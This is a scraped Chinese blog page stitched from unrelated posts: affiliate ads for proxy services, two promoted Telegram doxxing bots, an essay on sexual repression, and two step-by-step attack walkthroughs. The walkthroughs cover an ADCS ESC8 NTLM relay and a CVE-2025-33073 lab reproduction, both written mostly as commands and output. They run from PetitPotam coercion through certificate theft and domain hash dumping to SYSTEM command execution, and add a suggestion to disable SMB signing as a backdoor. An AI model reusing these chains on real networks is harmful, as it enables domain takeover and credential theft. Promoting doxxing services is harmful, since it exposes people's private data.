# 机场和社工库

## 不限速稳定中转机场推荐：
优惠码: `DUANG114514`

OuO 8.25r/月 推荐⭐️⭐️⭐️⭐️⭐️⭐️⭐️ [链接](https://login.ouonetwork.com/register?aff=yqcTGpfM) 

![图片.png](/static/img/7b4a074368827f5dee94d2f8ee078cad.%C3%A5%C2%9B%C2%BE%C3%A7%C2%89%C2%87.webp)
**高峰期：拉满带宽，4k视频 1.5倍数**
![图片.png](/static/img/82a9a8ca4831ebcc2b33fdfe67a3d339.%C3%A5%C2%9B%C2%BE%C3%A7%C2%89%C2%87.webp)

**新机场** 渔云 60r/年 亮点：emby + ipv6 推荐⭐️⭐️⭐️⭐️⭐️⭐️ [链接](https://cloudfisher.one/web/#/login?code=7ZwPESLW)
![image.png](/static/img/482c0a7a68b9190601727cc6370794ce.image.webp)



## 性价比直连机场推荐


果粒橙 5r/月 推荐⭐️⭐️⭐️ 直连套餐[链接](https://guolicheng.cc/index.php#/register?code=f0mQa1nf) 

---
![Firefox 2024-07-22 10.27.02.png](/static/img/217d0b682a09966c91098843a3e555d4.Firefox%202024-07-22%2010.27.02.webp)
一分机场 2r/月 推荐⭐️⭐️⭐️⭐️[链接](https://webget.yfjc.xyz/#/register?code=Rc6dNjtN)

![image.png](/static/img/80cccdcb7d1dc75f19a827996a6a8619.image.webp)
鸡场 2r/月 推荐⭐️⭐️⭐️[链接](https://xn--mesx36n.net/#/register?code=aVMOe017)

![image.png](/static/img/410ce11598c209aec1647f015caa3f68.image.webp)

所有便宜机场都存在**随时跑路**风险。


# 社工库推荐

2024/7/22 更新可用

- 暗精灵社工库 [链接](https://t.me/AJL01_bot?start=uaACuhJQxB) ⭐️⭐️⭐️推荐

- 黑盒-社工库人肉机器人 [链接](https://t.me/BOXsgkbot?start=JEhvGEY) ⭐️⭐️⭐️⭐️推荐




## VPS推荐

野草云 [⭐️⭐️⭐️⭐️⭐️链接](https://my.yecaoyun.com/aff.php?aff=2711)

买的时候留意优惠卷(官网活动)，一般2h4g 香港主机 价格在120左右


![图片.png](/static/img/6216a1cf66d5abb0d48c72f3df24c5af.%C3%A5%C2%9B%C2%BE%C3%A7%C2%89%C2%87.webp)
截至2025.1.20,2h4g大概在130左右，还是很具性价比的。
![](https://blog.897010.xyz/static/img/efd3499112e6aea75f89e832dc09fcfd.å¾ç.webp)


另低价GPT4 Cladue3.5 等Ai需求可以留言

社工库/机场推荐/Cursor白嫖

### 条件
> 一台能访问域的电脑 (本次演示纯粹的域外)
>
> 一个域账号


 


### 漏洞检测
查询是否存在相关ESC漏洞，获取CA主机名和CA域名

```plain
certipy-ad find -u meetingroom@hacker.0day.com -p hacker@123456 -dc-ip 172.x.x.1 -vulnerable -stdout
```

```plain
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 2 certificate authorities
[*] Found 22 enabled certificate templates
[*] Trying to get CA configuration for 'HACKER-CASERVER-CA' via CSRA
[!] Got error while trying to get CA configuration for 'HACKER-CASERVER-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'HACKER-CASERVER-CA' via RRP
[*] Got CA configuration for 'HACKER-CASERVER-CA'
[!] Failed to resolve: adrms01.HACKER.0day.com
[*] Trying to get CA configuration for 'HACKER-ADRMS01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'HACKER-ADRMS01-CA' via CSRA: [Errno -2] Name or service not known
[*] Trying to get CA configuration for 'HACKER-ADRMS01-CA' via RRP
[!] Got error while trying to get CA configuration for 'HACKER-ADRMS01-CA' via RRP: [Errno Connection error (adrms01.HACKER.0day.com:445)] [Errno -2] Name or service not known
[!] Failed to get CA configuration for 'HACKER-ADRMS01-CA'
[!] Failed to resolve: adrms01.HACKER.0day.com
[!] Got error while trying to check for web enrollment: [Errno -2] Name or service not known
[*] Enumeration output:
Certificate Authorities
 0
 CA Name : HACKER-CASERVER-CA
 DNS Name : CASERVER.HACKER.0day.com
 Certificate Subject : CN=HACKER-CASERVER-CA, DC=HACKER, DC=JHHHHHHHHHHHHHHHHHHHHHHHsemi, DC=com
 Certificate Serial Number : 1C8C8BE4766A07AB4D408E10A583C9AA
 Certificate Validity Start : 2022-06-23 05:48:39+00:00
 Certificate Validity End : 2121-06-23 05:58:38+00:00
 Web Enrollment : Enabled
 User Specified SAN : Disabled
 Request Disposition : Issue
 Enforce Encryption for Requests : Enabled
 Permissions
 Owner : HACKER.0day.com\Administrators
 Access Rights
 ManageCertificates : HACKER.0day.com\Administrators
 HACKER.0day.com\Domain Admins
 HACKER.0day.com\Enterprise Admins
 ManageCa : HACKER.0day.com\Administrators
 HACKER.0day.com\Domain Admins
 HACKER.0day.com\Enterprise Admins
 Enroll : HACKER.0day.com\Authenticated Users
 [!] Vulnerabilities
 ESC8 : Web Enrollment is enabled and Request Disposition is set to Issue
 1
 CA Name : HACKER-ADRMS01-CA
 DNS Name : adrms01.HACKER.0day.com
 Certificate Subject : CN=HACKER-ADRMS01-CA, DC=HACKER, DC=0day, DC=com
 Certificate Serial Number : 17FAD204DF8B19BE4C58B64A8B0B7755
 Certificate Validity Start : 2022-02-16 09:32:37+00:00
 Certificate Validity End : 2121-02-16 09:42:37+00:00
 Web Enrollment : Disabled
 User Specified SAN : Unknown
 Request Disposition : Unknown
 Enforce Encryption for Requests : Unknown
Certificate Templates : [!] Could not find any certificate templates
```

出现ESC8漏洞特征

`ESC8 : Web Enrollment is enabled and Request Disposition is set to Issue`

通过Ping CA域名的方式获取CA服务器的实际IP

或利用AdExplorer进行查找DNS记录

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/7b0e6dac619b4f007cf88db66d51e152.png)

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/a67edd59faaaca3f4eaa0fd3f3ba41b8.png)

```plain
CA主机名: HACKER-ADRMS01-CA
CA域名: CASERVER.HACKER.0day.com
CA hostname :172.x.x.10 
DNS: HACKER.0day.com
```

访问 `http://CA证书服务器IP/certsrv/`

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/afb03c23ead65f607a67619c4fa143ef.png)

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/a4bbc8ea395d4d49c72f1f07f2feff85.png)

由于本机杀毒原因，Impacket包无法留存，Ntml中继只能在虚拟机Kali中进行，使用FRP代理出来

需要强调的是**windows一般默认开启SMB会占用445端口，需要提前关闭SMB服务**

```plain
serverAddr = "172.x.x.195"
serverPort = 7000

[[proxies]]
name = "test-tcp"
type = "tcp"
localIP = "127.0.0.1"
localPort = 445
remotePort = 445

[[proxies]]
name = "tesxx"
type = "tcp"
localIP = "127.0.0.1"
localPort = 80
remotePort = 80

[[proxies]]
name = "x"
type = "tcp"
localIP = "127.0.0.1"
localPort = 9389
remotePort = 9389

[[proxies]]
name = "xs"
type = "tcp"
localIP = "127.0.0.1"
localPort = 6666
remotePort = 6666
```

![](C:\Users\Sec\AppData\Roaming\marktext\images\2024-11-14-09-31-27-image.png)确保frp代理端口正常通信，可以使用python -m http.sever 445/80 分别验证代理出445和80端口后，使用ntlmrelayx / certipy-ad进行中继

### 中继NTLM
```bash
ntlmrelayx：
impacket-ntlmrelayx --target http://172.x.x.10/certsrv/certfnsh.asp -smb2support --adcs -debug --template DomainController

impacket-ntlmrelayx --target http://CA服务器地址/certsrv/certfnsh.asp -smb2support --adcs -debug --template DomainController

certipy-ad：
certipy-ad relay -target 172.x.x.10 -template DomainController

certipy-ad relay -target CA服务器地址 -template 证书格式，默认就行 
```

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/4e50394e12e3564b9f0c7ab0b5c12ea3.png)

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/453b20d6dcd56276b7e78a6a0a7d7595.png)

强制域控访问我们的中继服务器，方法很多，这边使用PetitPotam实现

```plain
python3 PetitPotam.py -u 'meetingroom' -p 'hacker@123456' -d 'hacker.0day.com' 172.x.x.195 172.x.x.1


python3 PetitPotam.py -u ' -p '' -d '' 监听的中继IP 域控IP #域控win16以下时支持匿名访问
```

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/b7c52d52eb88dccec37948c0aa18da4d.png)

攻击成功，查看中继监听的回显，获取到pfx格式证书

1.**Certipy**

成功获取的情况下，将直接保存为pfx证书文件

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/ebd11770eabea92ac36d4e383ab46ecc.png)

2.**impacket**

impacket=0.12.0

成功获取的情况下，将直接保存为pfx证书文件1

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/a3a57761a30846a36fea9e6618b00ffb.png)

impacket=0.10.0

成功获取的情况下，将以base64格式输出到终端

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/b45c73e2b581e621f3e352d37195a3a0.png)

```bash
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client RPC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 127.0.0.1, attacking target http://172.x.x.10
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://172.x.x.10 as HACKER/DC03$ SUCCEED
[*] SMBD-Thread-7 (process_request_thread): Connection from 127.0.0.1 controlled, but there are no more targets left!
[*] SMBD-Thread-8 (process_request_thread): Connection from 127.0.0.1 controlled, but there are no more targets left!
[*] SMBD-Thread-9 (process_request_thread): Connection from 127.0.0.1 controlled, but there are no more targets left!
[*] SMBD-Thread-10 (process_request_thread): Connection from 127.0.0.1 controlled, but there are no more targets left!
[*] SMBD-Thread-11 (process_request_thread): Connection from 127.0.0.1 controlled, but there are no more targets left!
[*] SMBD-Thread-12 (process_request_thread): Connection from 127.0.0.1 controlled, but there are no more targets left!
[*] SMBD-Thread-13 (process_request_thread): Connection from 127.0.0.1 controlled, but there are no more targets left!
[*] SMBD-Thread-14 (process_request_thread): Connection from 127.0.0.1 controlled, but there are no more targets left!
[*] SMBD-Thread-15 (process_request_thread): Connection from 127.0.0.1 controlled, but there are no more targets left!
[*] SMBD-Thread-16 (process_request_thread): Connection from 127.0.0.1 controlled, but there are no more targets left!
[*] SMBD-Thread-17 (process_request_thread): Connection from 127.0.0.1 controlled, but there are no more targets left!
[*] SMBD-Thread-18 (process_request_thread): Connection from 127.0.0.1 controlled, but there are no more targets left!
[*] SMBD-Thread-19 (process_request_thread): Connection from 127.0.0.1 controlled, but there are no more targets left!
[*] SMBD-Thread-20 (process_request_thread): Connection from 127.0.0.1 controlled, but there are no more targets left!
[*] SMBD-Thread-21 (process_request_thread): Connection from 127.0.0.1 controlled, but there are no more targets left!
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] GOT CERTIFICATE! ID 146
[*] Base64 certificate of user DC03$: 
MIISBQIBAzCCEb8GCSqGSIb3DQ.............. 
```

### 后续利用
利用Certipy-ad进行解密pfx格式文件，获取到域管Hash值

```plain
certipy-ad auth -pfx DC03\$.pfx -dc-ip 172.x.x.1 -debug 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: dc03$@hacker.0day.com
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'dc03.ccache'
[*] Trying to retrieve NT hash for 'dc03$'
[*] Got hash for 'dc03$@hacker.0day.com': aad3b435b51404eeaad3b435b51404ee:3xxxxxxxxxxxxxxxxxxxx1
```

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/9392d15f5662c48d5491f5b50b53946f.png)

使用impacket包中的secretsdump.py导出域用户hash

```bash
python secretsdump.py -hashes :39xxxxxxxxxxx611 hacker.0day.com/dc03\$@172.x.x.1
```

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/81e3ec77a920c89d137e2a73c54f1a26.png)

也可以使用下面命令导出指定用户的hash，防止操作过于敏感

```bash
secretsdump.py -hashes :3xxxxxxxxxxxxxxxxxxxx1 -dc-ip 172.x.x.1 " hacker.0day.com/dc03\$@172.x.x.1" -just-dc-user "域用户名" -debug
```

使用wmiexec.py进行命令执行，需要注意的是这里使用的dc03$用户的hash无法使用wmi命令执行

使用账号didiao的hash值进行命令执行

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/faaccb30b835e6b9dedbca13d91d9c15.png)

获取**域控操作权限**

通过ADExplorer64.exe（微软官方的域控制器工具）利用ldap查询相关DNS记录得到特定用户的机器IP地址，再配合hashes使用wmiexec等组件进行指定横向。

`DomainDnsZones-->MicrosoftDNS-->域名--->指定用户`![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/905207055a63ed6d06afad7379ae9cb5.png)

dnsRecord的值中最后位置既为该用户的机器IP地址。如图

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/a7aac7e4daa88f3b3ccdf1a97b4ec357.png)



## 总结
相关原理总结，从个人理解的角度上来说，ADCS是基于http这种未加密协议和NTLM的认证机制，导致恶意用户偷取域管NTLM。而整个域渗透的大部分漏洞都是围绕在两种认证方式上面。

必要条件：

+ 域管存在强制认证漏洞
+ CA服务器可以注册并采用HTTP协议


### 梳理
> 1. **漏洞检测**：
> - 使用Certipy工具检测域内是否存在ESC8漏洞，获取CA主机名和域名。
> - 检测结果显示存在两个证书颁发机构（CA），其中一个名为HACKER-CASERVER-CA的CA存在ESC8漏洞，表现为Web Enrollment启用且Request Disposition设置为Issue。
> 2. **获取CA信息**：
> - 通过Ping CA域名或使用AdExplorer工具查找DNS记录来获取CA服务器的实际IP地址。
> - 文档中提到的CA主机名为HACKER-ADRMS01-CA，域名为CASERVER.HACKER.0day.com，实际IP为172.x.x.10。
> 3. **设置代理和中继**：
> - 由于杀毒软件的干扰，Impacket包无法留存，因此使用FRP代理将NTLM中继从虚拟机Kali中代理出来。
> - 需要关闭SMB服务以避免端口冲突，并设置FRP代理端口以确保正常通信。
> 4. **中继NTLM**：
> - 使用ntlmrelayx和certipy-ad工具进行NTLM中继攻击，目标是HACKER-CASERVER-CA的CA服务器。
> - 通过PetitPotam工具强制域控制器访问中继服务器，成功获取pfx格式的证书。
> 5. **后续利用**：
> - 使用Certipy-ad工具解密pfx文件，获取域管理员的NTLM哈希值。
> - 使用impacket包中的secretsdump.py工具导出域用户哈希值。
> - 使用wmiexec.py工具进行命令执行，获取域控制器操作权限。
> 6. **总结**：
> - ADCS基于HTTP协议和NTLM认证机制，存在强制认证漏洞，允许恶意用户窃取域管理员的NTLM哈希。
> - 域渗透的大部分漏洞都围绕这两种认证方式。
> - 攻击成功的条件包括域管理员存在强制认证漏洞和CA服务器可以通过HTTP协议注册。
>

ADCS ESC-8 域外利用

### 个体成长

在知乎上刷到了一篇文章，讨论如何看待中国的性压抑。有一篇高赞答主的回答视角很特别：



> 本质上，性压抑只是工具之一。通过青少年时期持续的饥饿和物质匮乏，可以有效塑造缺陷人格，完成对人的“去主体化”。比如，集体环境对于私域的打压，有意识地缺失对性的教育（性压抑、性隔离）等等。






父母在孩子青少年时期，对其个人空间的深恶痛绝和侵占。社会对于性欲这本应和食欲同等普遍的欲望的异化、忽视甚至打压，其关键都在于对他人的凝视，物化，工具化，潜移默化中该过程内化到个体本身。

于是被凝视者的客体化（去主体化）发生了。

细思极恐的是，我们无法判断这一点是否为**执棋者在制度文化下的刻意为之**。大部分父母和被裹挟的普通人都是这一局面的缔造者和拥护者(他们不是邪恶大BOSS，只不过是被集体凝视，后又集体凝视他人)。

但无论如何，
如此培养的“孩子”才更容易成为好用的**“工具”**，无论是为社会创造价值，还是承担家庭责任。



**“远离人群即远离愚蠢”**



由客体化这个概念，联想到了关于两性。在这个领域，归纳出一些有意思的观念：不管是阿尔法、米格道还是自然流或PUA，乃至于当前时代极度重要的公众表达能力（自媒体），都是在强调**一个人对于现实世界的扭曲能力**。

人们 
通过输出内容、表达观点 
去影响他人的认知 
去赢得共识、他人的信任 
乃至于去获得信仰（联想到陈桂林除三害中的邪教头子）

而这一切的基础或许就是主体化。

深入探讨主体化的本质：稳定统一的心境、真实一致的言行、自洽自足而没有消耗的自我相处之道（节流），拥有梦想，那种自我疯狂到他人看来痴迷的状态（开源）。

抽离出来，这些都是内在高能量的体现。而能量只会自发地从高流到低。

如同太阳滋润大地，人类就此达成了对现实世界的扭曲。

与之相反的客体化，即与自我的对立、矛盾、自我工具化、自我压抑、自卑怯懦等负面缺陷集合。人生不由“**我**”主导，不承担责任的同时，自然也缺失了对这个世界改造的能动性。

**要么作为按着他人剧本走向成功的NPC，又或是自由潇洒但不一定成功的主角**

而在Game当中，就是双方不断对抗，衡量对方主体化程度的过程。

赢者通吃。失败者被物化，工具化，沦为主角取乐的NPC。

由此想到萨特的那句“**他人即地狱**”

作为普通人的我们，被裹挟、被浸润在各种服务器意识形态里面，大部分的思想并不源于自身思考，大部分的行为并不源于自身意志。最可怕的是，就连自认为的“我”（人格），也可能是他人刻意塑造的产物。

从出生到死去的路径，都由这双看不见的手写死了。不可谓不悲哀。

不禁想起鲁迅先生的名言：

> **“我翻开历史一查，这历史没有年代。歪歪斜斜的每页上都写着‘仁义道德’几个字，我横竖睡不着，仔细看了半夜，才从字缝里看出来，满本上都写着两个字‘吃人’！”**


最后，我们应该感谢这个信息爆炸的时代，锁死人类的智子。从来只有“信息”，而正是当今互联网最普遍的信息，才让我们能时不时脱离深海，偶尔鱼跃而出，看到这个世界的真实，而非一辈子在家庭的教育、周围的朋友、刻意塑造的文化环境这些匮乏的信息源里面耗费半生。


---

人类：一种奇怪的生物，有的靠自杀寻求湮没，有的长期沉溺于那些自我生产，通过脑部构建出的情绪体验以达到兴奋平衡点。

却又会在某个间隙称之为安全感缺乏、自卑和焦虑。

为了确保"自嗨"的高质量不被打扰，常常伴随着高强度的自我封闭隔离，脱离现实，抗拒具体的人际交往(现实世界的单一快乐源存在局限性，可值得庆幸的是自嗨无上限！)。

于是，越是抽象，越是无人打扰，自我如同永动机般源源不断地生产出各种高烈度，风味丰富的负性刺激，实现满足。

心灵的枷锁：性压抑与个体主体化

# CVE-2025-33073 靶场搭建+复现

**机器：**

```
 Kali 攻击机 192.168.203.134

 WIN10 被攻击机 192.168.203.131

 WinH22 域控机 192.168.203.10
```




 **工具：**

- pretender:https://github.com/RedTeamPentesting/pretender

- Ntlmrelayx:https://github.com/fortra/impacket

- Netexec: https://www.netexec.wiki/

**账号：**

hack\d1 //低权限，可以看到下图对于权限的对比

![image-20250620012508546](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/image-20250620012508546.png)

## 环境准备

### 1.VMware 安装域控

具体安装过程和加域，可参考下面文章：
https://blog.csdn.net/jiaqu2177/article/details/81943615

![image-20250620015242330](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/image-20250620015242330.png)

#### 添加域账号：
1. **登录到域控制器：** 使用具有域管理员权限的账户登录到您的域控制器。
2. **打开 Active Directory 用户和计算机：**
 * 点击“开始”菜单，搜索并打开“Active Directory 用户和计算机” (或者在“服务器管理器”中，点击“工具” -> “Active Directory 用户和计算机”)。

![image-20250620015324258](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/image-20250620015324258.png)

3. **导航到目标位置：**
 * 在左侧窗格中，展开您的域。
 * 通常，您会在 `Users` 容器中创建用户，但更好的做法是在自定义的组织单位 (OU) 中创建用户，以便更好地管理和应用组策略。例如，您可以展开到 `hack.com` -> `Users` 或您自定义的 OU (例如 `hack.com` -> `Sales` -> `Users`)。

4. **创建新用户：**
 * 在右侧窗格的空白区域右键单击，选择 **“新建” (New)** -> **“用户” (User)**。 或者，在左侧选中目标容器/OU，然后点击菜单栏上的“创建新用户”图标。

![image-20250620015409910](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/image-20250620015409910.png)

![image-20250620020020093](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/image-20250620020020093.png)

### 2.Win10 被攻击机器

### 关闭防火墙

需要**关闭防火墙**，否则默认拦截kali发起的smb流量

![image-20250620020140910](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/image-20250620020140910.png)

### 关闭SMB签名 （默认）：

Powershell ： `Get-SmbServerConfiguration`

![image-20250620020322525](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/image-20250620020322525.png)

**`EnableSecuritySignature : False`**: 这表示 SMB 安全签名是 **禁用** 的。 

**`RequireSecuritySignature : False`**: 这表示 **不强制** 要求 SMB 安全签名。 

```
PS C:\Users\Administrator> Set-SmbServerConfiguration -RequireSecuritySignature $false -Confirm:$false
PS C:\Users\Administrator> Get-SmbServerConfiguration | Select-Object RequireSecuritySignature

RequireSecuritySignature
------------------------
 False
```



## 漏洞复现

### DNS解析

#### 方案一：

可以使用 pretender 在局域网里开启域名监听（该方法限于同一局域网，不会在域内添加 DNS 记录较隐蔽）

```
./pretender -i "eth0" --spoof "localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" --no-dhcp-dns --no-timestamps
```

#### 方案二：

使用 dnstool 向域内添加 DNS 记录（该方法可在不同局域网使用）

```
dnstool.py -u 'hack.com\d1' -p 'Qa112211' 192.168.203.10 -a add -r localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA -d 192.168.203.134
```

### 中继监听

```
impacket-ntlmrelayx -t 192.168.203.131(被攻击机) -smb2support
```

### 强制认证漏洞

扫描win10机器是否存在强制认证漏洞

```
nxc smb 192.168.203.131 -u "d1" -p "Qa112211" -M coerce_plus --verbose
```

![image-20250620012143236](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/image-20250620012143236.png)

可以看到存在多个强制认证漏洞，这里就用最常见的：PetitPotam

```
┌──(root㉿kali-plus)-[~/Downloads]
└─# nxc smb 192.168.203.131 -u "d1" -p "Qa112211" -M coerce_plus -o METHOD=Pe LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA --verbose

[-] Failed loading module at /usr/lib/python3/dist-packages/nxc/modules/enum_ca.py: No module named 'requests'
[-] Failed loading module at /usr/lib/python3/dist-packages/nxc/modules/empire_exec.py: No module named 'requests'
[01:38:23] INFO Socket info: host=192.168.203.131, hostname=192.168.203.131, kerberos=False, ipv6=False, link-local connection.py:165
 ipv6=False 
 INFO Creating SMBv3 connection to 192.168.203.131 smb.py:606
 INFO Creating SMBv1 connection to 192.168.203.131 smb.py:575
 INFO Resolved domain: hack.com with dns, kdcHost: 198.19.7.197 smb.py:321
SMB 192.168.203.131 445 TEST001 [*] Windows 10 / Server 2019 Build 19041 x64 (name:TEST001) (domain:hack.com) (signing:False) (SMBv1:True)
 INFO Creating SMBv3 connection to 192.168.203.131 smb.py:606
SMB 192.168.203.131 445 TEST001 [+] hack.com\d1:Qa112211 
 INFO Loading modules for target: 192.168.203.131 connection.py:589
COERCE_PLUS 192.168.203.131 445 TEST001 VULNERABLE, PetitPotam
COERCE_PLUS 192.168.203.131 445 TEST001 Exploit Success, lsarpc\EfsRpcAddUsersToFile
 
```

可以看到成功获取到了NTLM HASH

![image-20250620013833341](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/image-20250620013833341.png)

```
┌──(root㉿kali-plus)-[~/Downloads]
└─# impacket-ntlmrelayx -t 192.168.203.131 -smb2support -c whoami
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client RPC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 192.168.203.131, attacking target smb://192.168.203.131
[*] Authenticating against smb://192.168.203.131 as / SUCCEED
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Executed specified command on host: 192.168.203.131
nt authority\system

[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry
[*] All targets processed!
[*] SMBD-Thread-7 (process_request_thread): Connection from 192.168.203.131 controlled, but there are no more targets left!


```

## 漏洞分析：

**NTLM Reflection攻击** 不是一个陌生的漏洞利用方式了。像之前的ADCS ESC-8 也是利用差不多的链条。

漏洞的出现有几个关键点：

## SMB 客户端的缺陷

### 错误截断：

当用户输入的 `test1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA` 时，SMB 客户端会将`1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA`解析为 `MarshalledTargetInfo`( Kerberos 扩展字段)，最后截断后得到的是 `test`。

> Kerberos SSPI 支持一种特殊的 SPN 格式（如 CASTELBLACK1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA），如果 Kerberos SSPI 遇到这种格式的 SPN，它会计算新字符串的长度，将其与 SPN 进行分割，然后继续使用新的 SPN 字符串进行验证过程。SMB 客户端为了支持这种格式，会调用 SecMakeSPNEx2 API，该 API 又会调用 CredMarshalTargetInfo 来构建新的字符串，并将其附加到 SPN 的末尾。

而为了验证目标服务器的名称和当前计算机是否为同一台机器，`SspIsTargetLocalhost` 函数会对 IP 或者域名进行比对，如果目标服务器使用的是域名，则会将域名和以下三个内容做比较：

- 机器的 FQDN (CASTELBLACK.NORTH.SEVENKINGDOMS.LOCAL)
- 机器的主机名 (CASTELBLACK)
- localhost

### **本地 NTLM 认证的信任机制**

Windows 的 **NTLM 认证** 有一个优化机制：

- **如果是本地进程访问本地服务**（比如 `localhost` 或本机主机名），就不需要严格验证（因为“自己人”无需防）。

- **如果是远程访问**，就必须检查签名、挑战值（Challenge）等安全措施。

- **它依赖两个关键字段**：

 - `Calling Workstation Name`（工作站名，如 `test`）

 - `Calling Workstation Domain`（域名，如 `test.hack.com`）

### 域控 CVE-2025-33073？

为什么域控没办法被CVE-2025-33073影响，原因很简单，因为域控**默认开启SMB签名**，所以如果手动关闭，依然可以使用该漏洞实现接管

```
手动关闭
PS C:\Users\Administrator> Set-SmbServerConfiguration -RequireSecuritySignature $false -Confirm:$false
PS C:\Users\Administrator> Get-SmbServerConfiguration | Select-Object RequireSecuritySignature

RequireSecuritySignature
------------------------
 False
```

![image-20250620024238384](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/image-20250620024238384.png)

由此是不是可以作为一种持久化后门的手段。 

参考文章：

https://mp.weixin.qq.com/s/Ew9OULVjM-zLAxpMsaUyvQ

CVE-2025-33073 靶场搭建+复现

内网-横向移动-总结

google-site-verification

首页

分类

时间线

Red💊

杀软识别

摸鱼魔方

Chatgpt

Wiki-漏洞文库

工具列表

关于

每日资讯

威胁情报

机场和社工库

不限速稳定中转机场推荐：

条件

个体成长

CVE-2025-33073 靶场搭建+复现

横向移动

PTH横向